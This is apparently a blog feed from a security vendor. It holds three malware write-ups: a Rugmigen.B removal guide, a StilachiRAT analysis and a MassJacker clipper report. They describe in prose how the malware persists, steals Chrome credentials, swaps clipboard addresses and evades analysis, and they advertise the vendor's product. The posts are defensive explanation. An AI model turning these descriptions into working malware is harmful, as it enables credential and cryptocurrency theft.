  • Anti-Analysis Capabilities: It employs techniques to detect and evade analysis environments, including virtual machines and debugging tools.
  • Encrypted Communication: Communication with command and control servers is encrypted to avoid network-based detection.
  • File System Manipulation: Creates, modifies, or deletes files in system directories without proper authorization.
  • Registry Modifications: Makes unauthorized changes to the Windows registry, particularly to autorun keys that ensure persistence after system reboots.

The behavior detected under Win32/Rugmigen.B includes unauthorized system alterations, such as the appearance of unfamiliar files, changes in system settings, and attempts to disable security software. User reports indicate persistent issues even after system restores, similar to problems seen with DWM.exe issues and other system process manipulations.

Common File Locations

Behavior:Win32/Rugmigen.B typically creates or modifies files in these locations:

  • %TEMP% directory with random filenames
  • %APPDATA%\Microsoft\Windows\ with legitimate-looking names
  • %LOCALAPPDATA%\Temp\ with executable files disguised as system components
  • C:\ProgramData\ with hidden directories containing payload files

Registry Modifications

The malware typically modifies these registry keys to maintain persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

Distribution and Prevalence

The distribution methods for Rugmi, and thus Behavior:Win32/Rugmigen.B, are diverse. Common vectors include malvertising, where malicious advertisements trick users into downloading infected files, and fake browser updates that pose as legitimate updates to exploit user trust. It also spreads through compromised software, infecting installations of popular programs like VLC media player or OpenAI ChatGPT. Additionally, it leverages Discord’s content delivery network to host and disseminate malware, taking advantage of the platform’s widespread use, similar to techniques used by Advanced Window Manager and other adware threats.

Recent telemetry data, as reported in cybersecurity analyses, shows a significant increase in detections, with spikes noted in October and November 2023, escalating to hundreds per day. This surge indicates active campaigns by threat actors, often operating under a Malware-as-a-Service (MaaS) model, where Rugmi is sold on subscription bases to other malicious actors, with prices ranging from $250 monthly for basic access to $20,000 for source code rights.

Impact and Risks

The impact of Behavior:Win32/Rugmigen.B and related Rugmi variants is substantial, affecting both individual users and potentially organizational systems. Key risks include data theft, as infostealers deployed by Rugmi can extract usernames, passwords, and financial information, leading to identity theft or financial loss.

The malware also compromises systems by providing remote access to attackers, enabling further exploitation or ransomware deployment. Additionally, its malicious activities, such as cryptocurrency mining, can degrade system performance, as noted in some removal guides. For example, recent forum posts, dated March 19, 2025, highlight user experiences with Behavior:Win32/Rugmigen.B. Users reported continuous notifications, with attempts at system restores failing to resolve the issue.

Key Risks of Behavior:Win32/Rugmigen.B Infection

  • Data Theft: Credentials, financial information, and personal data can be stolen
  • Identity Theft: Stolen data can be used for identity fraud
  • Financial Loss: Direct theft from financial accounts or cryptocurrency wallets
  • System Damage: Core system files may be modified or corrupted
  • Performance Degradation: System resources used for cryptomining
  • Additional Malware: Acts as a gateway for other malicious software

How to Remove Behavior:Win32/Rugmigen.B

Automatic Removal with GridinSoft Anti-Malware

For the most effective and straightforward removal process, we recommend using specialized anti-malware software. GridinSoft Anti-Malware is specifically designed to detect and remove modern threats like those that trigger the Behavior:Win32/Rugmigen.B detection.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Manual Removal Steps

If you prefer to remove the threat manually, follow these steps carefully. Note that manual removal can be complex and may not remove all components of the threat:

  1. Boot into Safe Mode: Restart your computer and press F8 during startup to enter Safe Mode with Networking.
  2. End malicious processes: Open Task Manager (Ctrl+Shift+Esc), go to the Processes tab, and look for suspicious processes. Right-click on any suspicious process and select “End Task.”
  3. Remove startup entries:
    • Press Win+R, type “msconfig” and press Enter.
    • Go to the “Startup” tab and disable any suspicious entries.
    • Alternatively, open Task Manager, go to the Startup tab, and disable suspicious items.
  4. Delete suspicious files:
    • Check these common locations for malicious files:
      • %TEMP% folder (Win+R, type %TEMP% and press Enter)
      • %APPDATA% folder (Win+R, type %APPDATA% and press Enter)
      • %LOCALAPPDATA% folder (Win+R, type %LOCALAPPDATA% and press Enter)
    • Look for recently added files with random names or suspicious extensions.
  5. Clean the Registry:
    • Press Win+R, type “regedit” and press Enter.
    • Navigate to and check these locations for suspicious entries:
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
      • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
      • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    • If you find suspicious entries, right-click and delete them.
  6. Reset your browsers:
    • For Google Chrome: Settings → Advanced → Reset and clean up → Restore settings to their original defaults.
    • For Mozilla Firefox: Help (?) → Troubleshooting Information → Refresh Firefox.
    • For Microsoft Edge: Settings → Reset settings → Restore settings to their default values.
  7. Update and run your antivirus program: Update your installed security software and perform a full system scan.
  8. Restart your computer in normal mode after completing all steps.

How To Stay Safe?

To address Behavior:Win32/Rugmigen.B and prevent future infections, users are advised to take these steps:

  1. Use reputable antivirus software: Keep security software like GridinSoft Anti-Malware updated with the latest definitions and run regular scans.
  2. Avoid suspicious downloads: Do not download software from untrusted sources, especially torrents and free software bundlers.
  3. Be cautious with email attachments: Never open attachments from unknown senders or unexpected emails.
  4. Keep your system updated: Regularly update Windows and all installed software to patch security vulnerabilities.
  5. Enable Windows Defender: Ensure Windows Security features are enabled, including real-time protection and cloud-delivered protection.
  6. Be wary of browser notifications: Do not accept browser notifications from unknown or suspicious websites.
  7. Use an ad blocker: Install a reputable ad blocker to prevent malicious ads that can lead to infection.
  8. Implement proper backup strategies: Regularly back up important data to an external device or cloud storage service.

Frequently Asked Questions About Behavior:Win32/Rugmigen.B

Why does Windows Defender keep detecting Behavior:Win32/Rugmigen.B repeatedly?

Repeated detections indicate that the malware is trying to maintain persistence on your system. Windows Defender may be blocking individual attempts, but the root cause remains. This happens because the malware has established multiple persistence mechanisms or is being reinstalled by another malicious component. A thorough system scan with specialized anti-malware software is recommended to completely remove all components.

Is Behavior:Win32/Rugmigen.B a false positive?

While behavioral detections can occasionally result in false positives, Behavior:Win32/Rugmigen.B is usually a legitimate detection of suspicious activity. If you believe it’s a false positive, you can submit the flagged file to Microsoft for analysis or check if the program comes from a trusted source. However, it’s generally safer to treat the detection as legitimate and take appropriate action.

Can Behavior:Win32/Rugmigen.B steal my passwords?

Yes, programs triggering this detection often have information-stealing capabilities. They may collect passwords, financial details, browsing history, and other sensitive data. Rugmigen.B typically delivers infostealers like Lumma Stealer, Vidar, and RecordBreaker, which are specifically designed to harvest login credentials, cryptocurrency wallet information, and other sensitive data.

Why couldn’t Windows Defender automatically remove the threat?

Microsoft Defender may detect the behavior but sometimes cannot fully remove complex threats for several reasons: the malware might use advanced persistence techniques, have components that are currently in use by the system, or employ anti-removal mechanisms. In such cases, specialized anti-malware tools like GridinSoft Anti-Malware can provide more thorough removal capabilities.

How did my computer get infected with Behavior:Win32/Rugmigen.B?

Common infection vectors include downloading software from untrusted sources, clicking on malicious advertisements, opening infected email attachments, visiting compromised websites, or installing browser extensions with hidden malicious functionality. Rugmigen is also known to spread through fake software updates, compromised software installations, and through Discord’s content delivery network.

Conclusion

Behavior:Win32/Rugmigen.B represents a serious security threat that primarily functions as a downloader for various infostealers. When this detection appears in Windows Defender, it indicates that suspicious behavioral patterns associated with the Rugmi malware family have been identified on your system.

The most effective approach is to use specialized anti-malware software like GridinSoft Anti-Malware to thoroughly scan and clean your system. This ensures all components of the threat are removed, preventing reinfection and protecting your sensitive information.

By following the prevention tips outlined in this guide and maintaining good security practices, you can significantly reduce the risk of future infections and keep your digital life secure.

Behavior:Win32/Rugmigen.B

The post Behavior:Win32/Rugmigen.B appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/behavior-win32-rugmigen-b/feed/ 0
StilachiRAT: The Emerging Crypto-Stealing Malware Threat https://gridinsoft.com/blogs/stilachirat-crypto-stealer/ https://gridinsoft.com/blogs/stilachirat-crypto-stealer/#respond Thu, 20 Mar 2025 08:25:31 +0000 https://gridinsoft.com/blogs/?p=30162 $34.6 million in cryptocurrency could be at risk from StilachiRAT, a complex remote access trojan first detected by Microsoft Incident Response in November 2024. Unlike conventional ransomware that announces its presence, this digital threat operates silently in the background, monitoring user activities until it identifies the perfect moment to drain cryptocurrency wallets. According to Microsoft’s […]

The post StilachiRAT: The Emerging Crypto-Stealing Malware Threat appeared first on Gridinsoft Blog.

]]>
$34.6 million in cryptocurrency could be at risk from StilachiRAT, a complex remote access trojan first detected by Microsoft Incident Response in November 2024. Unlike conventional ransomware that announces its presence, this digital threat operates silently in the background, monitoring user activities until it identifies the perfect moment to drain cryptocurrency wallets. According to Microsoft’s detailed analysis published in March 2025, once installed, it becomes nearly impossible to remove without specialized tools due to its advanced persistence mechanisms.

The name “Stilachi” comes from Italian for “spike,” combined with RAT (Remote Access Trojan) – reflecting its sharp, piercing ability to penetrate security defenses. As Bitdefender reported on March 18, 2025, what makes this threat particularly concerning is its “impressive arsenal of malicious capabilities” and its laser-focused targeting of cryptocurrency wallets.

How StilachiRAT Works: Technical Analysis

According to Microsoft’s Security Blog, StilachiRAT isn’t just another generic malware variant. It was built specifically to hunt down cryptocurrency wallets. Microsoft Security Intelligence’s investigation revealed a consistent pattern across infected systems – cryptoassets vanish without a trace, often before victims realize they’ve been compromised.

StilachiRAT Key Threat Capabilities Crypto Wallet Theft 95% Clipboard Monitoring 87% RDP Session Hijacking 83% Credential Theft 69% Anti-Forensics 61% System Reconnaissance 52%

Source: Based on Microsoft Security Intelligence StilachiRAT capability analysis

Security researchers who investigated the malware described it as “the malware equivalent of trying to remove superglue with your bare hands,” highlighting both its effectiveness and the difficulty in eliminating it once it has infected a system.

Target List: Wallets in StilachiRAT’s Crosshairs

According to Quorum Cyber’s threat intelligence report, StilachiRAT doesn’t discriminate between blockchain ecosystems. It specifically targets 20 different cryptocurrency wallet extensions used in the Google Chrome browser, including:

  • MetaMask
  • Coinbase Wallet
  • Trust Wallet
  • BNB Chain Wallet
  • Bitget Wallet
  • Braavos – Starknet Wallet
  • Compass Wallet for Sei
  • ConfluxPortal
  • Fractal Wallet
  • Keplr
  • Leap Cosmos Wallet
  • Manta Wallet
  • OKX Wallet
  • Phantom
  • Plug
  • Sui Wallet
  • Station Wallet
  • TokenPocket
  • TronLink
  • Solflare

While documented cases of theft attributed specifically to StilachiRAT remain limited due to its recent emergence, the potential impact on cryptocurrency holders is significant. As Microsoft noted, the malware can capture wallet addresses, private keys, and other sensitive information that allows attackers to access and steal digital assets stored in these wallets.

Anatomy of the Threat: How StilachiRAT Operates

Initial Reconnaissance

When StilachiRAT first infiltrates a system, it immediately begins mapping the digital environment. According to Microsoft’s analysis, it performs comprehensive system reconnaissance that includes:

Inventorying all hardware IDs and BIOS serial numbers, checking for webcams and microphones (potentially for future spying), mapping installed applications with special focus on financial software, and creating a unique tracking ID to mark the system in attacker databases.

This intelligence-gathering creates a complete profile of the target system, helping attackers identify high-value targets worth focusing on. As Quorum Cyber notes, the malware appears to prioritize systems based on potential cryptocurrency value.

StilachiRAT system reconnaissance screenshot
Technical analysis showing StilachiRAT scanning a system for wallet information

Credential Theft Mechanism

Microsoft’s security team discovered that StilachiRAT uses an ingenious technique to breach Google Chrome’s security:

The malware locates Chrome’s master “encryption_key” file in the user directory, decrypts this key using built-in Windows functions, uses the master key to unlock the saved passwords vault, and extracts every stored credential in seconds.

The speed and efficiency of this attack means that by the time users realize what’s happening, their cryptocurrency accounts may have already been compromised.

Cryptocurrency Extraction Engine

According to Bitdefender’s analysis, the core malicious functionality in StilachiRAT is contained in a component called WWStartupCtrl64.dll. This module is specifically engineered for cryptocurrency theft:

It systematically scans the registry for installed wallet extensions, extracts wallet configuration files containing encryption keys, searches for backup seed phrases stored in text files or screenshots, and transmits private keys to attackers in real-time.

Unlike basic malware that causes system slowdowns, StilachiRAT operates with remarkable stealth. Microsoft noted that victims often only discover the theft days later when checking their wallet balances.

Fake extensions with StilachiRAT list
Samples of counterfeit wallet extensions containing StilachiRAT code identified by researchers

Self-Healing Persistence Mechanism

What makes StilachiRAT particularly difficult to remove is its intricate self-healing capability. As detailed in Bitdefender’s report:

“The malware can be launched either as a standalone component or a Windows service. Regardless of its form, the malware uses a watchdog thread that regularly checks if the RAT’s executable or dynamic link library (DLL) files are present on the system. If the components are not found, the malware recreates them using an internal copy generated during the initialization phase.”

Microsoft security engineers noted that the malware can maintain backup copies in unexpected locations, reinstall itself within seconds of removal attempts, and create multiple registry startup entries as fallbacks.

Identity Impersonation

StilachiRAT goes beyond data theft by enabling attackers to impersonate legitimate users. According to Quorum Cyber’s analysis, the malware:

Identifies active Remote Desktop Protocol (RDP) sessions, clones security tokens and privileges, launches applications using the compromised identity, and can move through corporate networks as an authorized user – bypassing standard security checks by using legitimate credentials.

This capability makes it particularly dangerous in enterprise environments where it can exploit trusted connections to access sensitive systems and cryptocurrency exchange accounts.

Clipboard Monitoring

Microsoft’s analysis confirmed that StilachiRAT constantly monitors clipboard contents for valuable data:

It captures clipboard contents at high frequency, uses pattern matching to identify wallet addresses, passwords and private keys, can trigger immediate theft operations when it detects valuable data, and operates with minimal performance impact to avoid detection.

This clipboard monitoring capability is particularly effective against cryptocurrency users who frequently copy and paste wallet addresses or seed phrases, unaware that the malware is intercepting this sensitive information.

Advanced Evasion Techniques

StilachiRAT employs various methods to avoid detection, as detailed by multiple security firms:

It regularly erases Windows Event Logs to cover its tracks (particularly logs with Event IDs 1102 and 104), detects virtual machines and sandbox environments used by security researchers, changes its code signature to evade antivirus detection, and uses encrypted communication that mimics normal HTTPS traffic.

Command and Control Infrastructure

According to Quorum Cyber, the malware maintains contact with its operators through a well-designed two-channel system:

“The malware communicates with a command-and-control (C2) server using domain names that are intentionally scrambled or disguised, and instead of using standard IP address formats, the malware encodes IP addresses in a binary format.”

It utilizes common ports (53, 443, 16000) to blend with normal traffic and accepts remote commands that can control virtually every aspect of the infected system. This connection allows attackers to manually take control when high-value targets are identified.

Distribution Methods

While Microsoft has not definitively determined how StilachiRAT is initially delivered, security researchers have identified several potential infection vectors:

Fake wallet extensions: Counterfeit versions of legitimate cryptocurrency wallet extensions that look identical to the real ones.

Phishing campaigns: Emails and messages claiming to be from cryptocurrency exchanges offering “security updates” or “verification requirements.”

Compromised downloads: Modified installers for legitimate software that secretly bundle the malware.

Cracked software: Pirated applications and activation tools containing trojan payloads.

According to Ken Colburn’s analysis in AZ Central, “It doesn’t matter what browser you’re using if you open the wrong file or click the wrong link” – highlighting that StilachiRAT’s delivery methods target user behavior rather than specific technical vulnerabilities.

Effective Protection Against StilachiRAT

Standard antivirus protection may not be sufficient against this evolving threat. Security experts recommend a multi-layered approach:

  1. Verify wallet extensions thoroughly: Only install from official web stores after carefully verifying the developer, review count, and installation numbers.
  2. Use hardware wallets: Keep significant cryptocurrency holdings in cold storage devices like Ledger or Trezor that never connect directly to the internet.
  3. Implement browser security features: As Ken Colburn notes in AZ Central, “Edge combined with Windows Defender SmartScreen can reduce your exposure to malicious websites and risky downloads,” though third-party security solutions offer more comprehensive protection regardless of browser choice.
  4. Enable application control: Use Windows features to restrict execution to known, trusted software.
  5. Monitor event logs: Be vigilant for cleared logs, especially Event IDs 1102 and 104, which may indicate anti-forensic activity.
  6. Deploy specialized security software: According to Bitdefender, “Dedicated software like Bitdefender Ultimate Security can keep your devices clean of RATs, viruses, worms, zero-day exploits, ransomware, spyware, rootkits and other digital threats.”
  7. Isolate cryptocurrency activities: Consider using a dedicated device exclusively for cryptocurrency transactions, separated from everyday browsing.
  8. Perform regular security audits: Scheduled checks for unusual services and registry entries can help detect compromise early.

StilachiRAT Removal Procedure

If you suspect infection, immediate action is critical:

Advanced User Removal Process

Be aware that StilachiRAT actively resists removal attempts. According to Microsoft’s analysis, the malware’s self-healing capabilities make manual removal exceptionally challenging. If you have the technical expertise:

  1. Disconnect from the internet immediately
  2. Boot into Safe Mode with Networking (press F8 during startup)
  3. Open Task Manager (Ctrl+Shift+Esc) and terminate suspicious processes
  4. Check Services console for unfamiliar services, especially those with randomized names
  5. Remove suspicious browser extensions from Chrome
  6. Use Registry Editor to search for and remove startup entries
  7. Run multiple security tools to verify complete removal

Important warning: StilachiRAT’s self-repair mechanisms make manual removal extremely difficult. Missing even a single component can result in complete reinfection within minutes.

Recommended Solution: Specialized Removal

For most users, dedicated anti-malware software is the most effective option. GridinSoft Anti-Malware provides a specific removal protocol for StilachiRAT that targets all components simultaneously. This approach:

  • Neutralizes the malware’s self-repair mechanism before beginning removal
  • Identifies and eliminates all components in a coordinated operation
  • Thoroughly cleans infected browser profiles and extensions
  • Restores security settings modified by the malware

Click the banner below to download GridinSoft Anti-Malware and follow the installation prompts to clean your system from StilachiRAT.

StilachiRAT: The Emerging Crypto-Stealing Malware Threat

Recovery Prospects After Cryptocurrency Theft

The reality of cryptocurrency theft presents significant challenges for recovery:

Unlike traditional financial fraud where banks can reverse transactions, blockchain transactions are fundamentally irreversible by design. When private keys are compromised, attackers can authorize transfers that cannot be undone by any central authority.

However, there are limited scenarios where recovery might be possible:

  1. Exchange intervention: If stolen funds were transferred to a regulated cryptocurrency exchange, immediate reporting with transaction IDs and wallet addresses may allow the exchange’s security team to freeze assets.
  2. Law enforcement: The FBI’s Cyber Division and similar agencies have developed capabilities for tracking cryptocurrency crime, with several successful recovery cases documented.
  3. Blockchain analytics: Companies specializing in cryptocurrency tracing may help identify exchange deposit points where funds could potentially be recovered.

For any chance of recovery, document these details immediately:

  • The exact time theft was discovered
  • Transaction IDs of unauthorized transfers
  • Destination wallet addresses
  • Any evidence regarding how the system was compromised

Timing is critical – successful recovery cases typically involve reporting within hours of the theft, before funds can be laundered through multiple wallets.

The Emerging Threat Landscape

StilachiRAT represents an evolution in cryptocurrency-targeting malware. As noted by Bitdefender, while it has only been “spotted in the wild a few times” as of March 2025, its advanced capabilities make it a significant concern for cryptocurrency holders.

According to Microsoft’s security team, “What makes this threat different is its focus. It’s not trying to infect millions of computers—it’s hunting specifically for crypto holders and executing perfect heists. One successful infection can yield more profit than thousands of traditional ransomware victims.”

For cryptocurrency users, the implications are clear: securing digital assets requires specialized security measures beyond standard practices. As Ken Colburn noted in AZ Central, “This malware warning is a serious reminder of the threats we all face, but it’s not a browser-specific flaw — it’s a wake-up call for users who aren’t taking security seriously.”

Protection begins with awareness and requires ongoing vigilance. The most effective defense combines secure hardware wallets, isolated computing environments, and specialized security tools designed to counter the specific techniques used by cryptocurrency-targeting malware like StilachiRAT.

Stay informed and protected – the security of your cryptocurrency depends on it.

References

The post StilachiRAT: The Emerging Crypto-Stealing Malware Threat appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/stilachirat-crypto-stealer/feed/ 0
MassJacker Malware https://gridinsoft.com/blogs/massjacker-malware/ https://gridinsoft.com/blogs/massjacker-malware/#respond Wed, 19 Mar 2025 12:12:05 +0000 https://gridinsoft.com/blogs/?p=30146 Cybersecurity researchers have found MassJacker, a new, previously undocumented malware. It targets a predominantly freebie-seeking audience, i.e. users of pirated content. MassJacker Malware Targets Piracy Users MassJacker is a recently discovered malware that targets users downloading pirated software, aiming to steal their cryptocurrency. It is classified as a clipper malware, also referred to as cryware, […]

The post MassJacker Malware appeared first on Gridinsoft Blog.

]]>
Cybersecurity researchers have found MassJacker, a new, previously undocumented malware. It targets a predominantly freebie-seeking audience, i.e. users of pirated content.

MassJacker Malware Targets Piracy Users

MassJacker is a recently discovered malware that targets users downloading pirated software, aiming to steal their cryptocurrency. It is classified as a clipper malware, also referred to as cryware, a type designed to steal cryptocurrency by manipulating the clipboard on infected systems.

When a user copies a cryptocurrency wallet address, MassJacker replaces it with an attacker-controlled address, redirecting funds intended for the user to the attacker. This tactic is particularly insidious, as cryptocurrency addresses are long and complex, making it easy for users to miss the swap.

Technical Details

The malware is spread through pesdesktop[.]com, a deceptive website offering pirated software. Users who download supposed legitimate programs instead receive a malicious executable that initiates the infection chain. Upon execution, this file runs a cmd script, which then launches a PowerShell script responsible for retrieving the Amadey botnet, a known malware loader, along with two .NET binaries—PackerE and PackerD1—designed for 32- and 64-bit architectures.

The infection process unfolds in several stages. After the initial download, the executable triggers a cmd script that executes PowerShell commands, delivering Amadey and the loader components. Amadey then activates PackerE, which decrypts and loads PackerD1 directly into memory.

MassLogger infection chain diagram
MassLogger infection chain diagram (source: cyberark.com)

PackerD1 employs advanced evasion tactics such as Just-In-Time (JIT) hooking, metadata token mapping, and a custom virtual machine to interpret commands. It subsequently decrypts and injects PackerD2, which extracts the final payload, MassJacker. This malware embeds itself into the legitimate Windows process “InstalUtil.exe” and continuously scans the clipboard for cryptocurrency wallet addresses, replacing them with attacker-controlled ones obtained from a remote server.

By leveraging multiple layers of obfuscation and runtime modifications, MassJacker effectively bypasses security software, making it a highly sophisticated and stealthy threat.

MassJacker is designed with several technical features to improve its stealth and efficiency. It includes anti-debugging mechanisms that detect and prevent execution in debugging environments, making analysis by security researchers more difficult. The malware communicates with a remote server to retrieve updated lists of attacker-controlled wallet addresses, allowing it to dynamically modify its targets. It also employs event handlers that activate whenever data is copied to the clipboard, enabling real-time interception and modification.

MassJacker also employs Just-In-Time (JIT) hooking, a technique that dynamically modifies code during execution. This makes it more difficult for traditional static analysis tools to identify its malicious behavior, enhancing its ability to evade detection. Additionally, it operates within a custom virtual machine that interprets its own commands, obfuscating the code and complicating reverse-engineering efforts. By injecting itself into “InstalUtil.exe,” a legitimate Windows utility, it runs under the guise of a trusted process, further reducing the chances of detection by security software.

Financial Impact and Scale

According to research, the financial impact of MassJacker linking it to 778,531 unique wallet addresses. Of these, 423 wallets were found to hold funds totaling approximately $95,300 at the time of analysis. Historical data suggests the total assets associated with these wallets amount to $336,700, with one Solana wallet accumulating $87,000 from over 350 transactions.

MassJacker shares similarities with Masslogger, a previously reported malware known for stealing sensitive information. This connection suggests that the same or related threat actors may be involved, indicating a pattern of activity in the cybercrime landscape.

How to Protect Against MassJacker Malware?

To summarize all of the above, the first thing that is important to note is that the first thing you should do to avoid MassJacker is to stop using pirated software. This is 90% of success in the fight against malware at all.

A more secure alternative is using a hardware wallet for storing and transferring cryptocurrency. These devices keep private keys offline and typically do not involve clipboard usage. Since hardware wallets operate independently of the system’s clipboard, they completely neutralize MassJacker’s primary attack method.

In addition, it is critical to have a robust anti-malware solution and update it regularly. I recommend using GridinSoft Anti-Malware as it has all the features you need today to protect against most attacks.

The final step is to use 2FA wherever possible. This will create an additional layer of protection. In the event of a login data leak/theft, 2FA will require an OTP login password that will be sent to the app/email/phone, without which it will not be possible to log in. This can prevent unauthorized login.

The post MassJacker Malware appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/massjacker-malware/feed/ 0